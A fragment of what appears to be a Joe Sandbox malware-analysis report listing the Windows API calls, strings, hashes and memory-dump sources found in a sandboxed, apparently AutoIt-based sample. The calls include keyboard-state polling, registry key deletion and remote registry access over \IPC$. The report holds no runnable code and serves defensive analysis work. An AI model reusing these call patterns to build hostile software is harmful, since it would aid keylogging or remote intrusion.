                                                                                                                                                                                                                                                                                                    • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A7E4D4
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A7E4FA
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7E504
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00A7E554
                                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A7E570
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A9D6C4
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A9D6ED
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A9D7A8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A9D70A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A9D71D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A9D72F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A9D765
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A9D788
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A9D753
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • timeGetTime.WINMM ref: 00A7EFCB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2F215: timeGetTime.WINMM(?,?,00A7EFEB), ref: 00A2F219
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00A7EFF8
                                                                                                                                                                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00A7F01C
                                                                                                                                                                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A7F03E
                                                                                                                                                                                                                                                                                                    • SetActiveWindow.USER32 ref: 00A7F05D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A7F06B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A7F08A
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00A7F095
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32 ref: 00A7F0A1
                                                                                                                                                                                                                                                                                                    • EndDialog.USER32(00000000), ref: 00A7F0B2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A7F374
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A7F38A
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7F39B
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A7F3AD
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A7F3BE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
APIs
• GetKeyboardState.USER32(?), ref: 00A7A9D9
• SetKeyboardState.USER32(?), ref: 00A7AA44
• GetAsyncKeyState.USER32(000000A0), ref: 00A7AA64
• GetKeyState.USER32(000000A0), ref: 00A7AA7B
• GetAsyncKeyState.USER32(000000A1), ref: 00A7AAAA
• GetKeyState.USER32(000000A1), ref: 00A7AABB
• GetAsyncKeyState.USER32(00000011), ref: 00A7AAE7
• GetKeyState.USER32(00000011), ref: 00A7AAF5
• GetAsyncKeyState.USER32(00000012), ref: 00A7AB1E
• GetKeyState.USER32(00000012), ref: 00A7AB2C
• GetAsyncKeyState.USER32(0000005B), ref: 00A7AB55
• GetKeyState.USER32(0000005B), ref: 00A7AB63
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Similarity
• API ID: State$Async$Keyboard
• String ID:
APIs
• GetDlgItem.USER32(?,00000001), ref: 00A76649
• GetWindowRect.USER32(00000000,?), ref: 00A76662
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00A766C0
• GetDlgItem.USER32(?,00000002), ref: 00A766D0
• GetWindowRect.USER32(00000000,?), ref: 00A766E2
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00A76736
• GetDlgItem.USER32(?,000003E9), ref: 00A76744
• GetWindowRect.USER32(00000000,?), ref: 00A76756
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00A76798
• GetDlgItem.USER32(?,000003EA), ref: 00A767AB
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A767C1
• InvalidateRect.USER32(?,00000000,00000001), ref: 00A767CE
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
APIs
  • Part of subcall function 00A11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A11488,?,00000000,?,?,?,?,00A1145A,00000000,?), ref: 00A11865
• DestroyWindow.USER32(?), ref: 00A11521
• KillTimer.USER32(00000000,?,?,?,?,00A1145A,00000000,?), ref: 00A115BB
• DestroyAcceleratorTable.USER32(00000000), ref: 00A529B4
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A1145A,00000000,?), ref: 00A529E2
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A1145A,00000000,?), ref: 00A529F9
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A1145A,00000000), ref: 00A52A15
• DeleteObject.GDI32(00000000), ref: 00A52A27
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A12234: GetWindowLongW.USER32(?,000000EB), ref: 00A12242
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00A12152
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6cd799da0c429bae0f6f92f1ea123c7127f5d473ec8ba67c0a8c3b338fd41f05
                                                                                                                                                                                                                                                                                                    • Instruction ID: fb0beaeeb8619aa300a4fe98acbf1ef4fb1d8b80ca7aa12dd718aa79777870ab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cd799da0c429bae0f6f92f1ea123c7127f5d473ec8ba67c0a8c3b338fd41f05
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D41BD31240641BFDB24DF689C88BFA3B75AB42361F144359FAA68B2E1C731CD92DB10
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00A60D31,00000001,0000138C,00000001,00000000,00000001,?,00A8EEAE,00AE2430), ref: 00A7A091
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00A60D31,00000001), ref: 00A7A09A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A60D31,00000001,0000138C,00000001,00000000,00000001,?,00A8EEAE,00AE2430,?), ref: 00A7A0BC
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00A60D31,00000001), ref: 00A7A0BF
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A7A1E0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                    • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4cc35b06de9abb95cf057bc95028ef50b6935b3d61007cf241a66246976e4787
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5cac49f739f4fb30836acef5689ffd6e659473ec1956f1c3eded2c7ed08bfd1f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cc35b06de9abb95cf057bc95028ef50b6935b3d61007cf241a66246976e4787
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE415172804219BACF05FBE0DE86DEEB778AF58300F504565F506B6092EB356F89CB61
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A71093
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A710AF
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A710CB
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A710F5
                                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00A7111D
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A71128
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A7112D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                    • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4fb9778a62eb4c3443e5035519625527c7ead21171bce0f59371980eda11955f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2ca9ca8cf91903a215e23d75791eb260ed48b8b0810c36e97ed3b445122fb2b0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fb9778a62eb4c3443e5035519625527c7ead21171bce0f59371980eda11955f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2410A72C10129ABCF11EBA4DC95DEEB7B8FF04750F408129E946A31A0EB319E45CB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00AA4AD9
                                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00AA4AE0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00AA4AF3
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00AA4AFB
                                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00AA4B06
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00AA4B10
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00AA4B1A
                                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00AA4B30
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00AA4B3C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: 282f2e0cb4176d31e465a6bccb63cb2d85641d9f55efd81e6ef14d11e1b7b39e
                                                                                                                                                                                                                                                                                                    • Instruction ID: b0d679c39c8a3c71fb19d1c8b6460137a59f12a6fe9f8fc43ad74a47a91d21de
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 282f2e0cb4176d31e465a6bccb63cb2d85641d9f55efd81e6ef14d11e1b7b39e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07316A7210021ABBDF129FA4DC08FDA3BA9FF4E364F110211FA56A61E0C775D861DBA4
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00A946B9
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00A946E7
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00A946F1
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9478A
                                                                                                                                                                                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00A9480E
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A94932
                                                                                                                                                                                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A9496B
                                                                                                                                                                                                                                                                                                    • CoGetObject.OLE32(?,00000000,00AB0B64,?), ref: 00A9498A
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00A9499D
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A94A21
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A94A35
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5d8caab77ad3cd9337af31e3ca2c8636e967f00d4436f0ae779fda88a80bdb38
                                                                                                                                                                                                                                                                                                    • Instruction ID: 54f6a2e1db7d07d017b51160b8f5fc4fa355d6d4c23ab30fa9a0ce036f02d79c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d8caab77ad3cd9337af31e3ca2c8636e967f00d4436f0ae779fda88a80bdb38
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8C10171604305AF8B00DF68C884D6BBBE9FF89748F10495DF98A9B261DB31ED46CB52
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00A88538
                                                                                                                                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A885D4
                                                                                                                                                                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00A885E8
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00AB0CD4,00000000,00000001,00AD7E8C,?), ref: 00A88634
                                                                                                                                                                                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A886B9
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00A88711
                                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00A8879C
                                                                                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A887BF
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00A887C6
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00A8881B
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00A88821
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: fe3d553cd62a2ed69bbb31288dede484aad7fd467cb998fca46555be5a1f7762
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3f27ea1d9c90e30ba1a8374019b2bf184b33059323a6253a3f0542b8eb6e21bc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe3d553cd62a2ed69bbb31288dede484aad7fd467cb998fca46555be5a1f7762
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62C12B75A00109AFCB14DFA4C984DAEBBF5FF48344B5484A9E41ADB261DB34ED41CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A7039F
                                                                                                                                                                                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00A703F8
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00A7040A
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A7042A
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00A7047D
                                                                                                                                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A70491
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A704A6
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00A704B3
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A704BC
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A704CE
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A704D9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
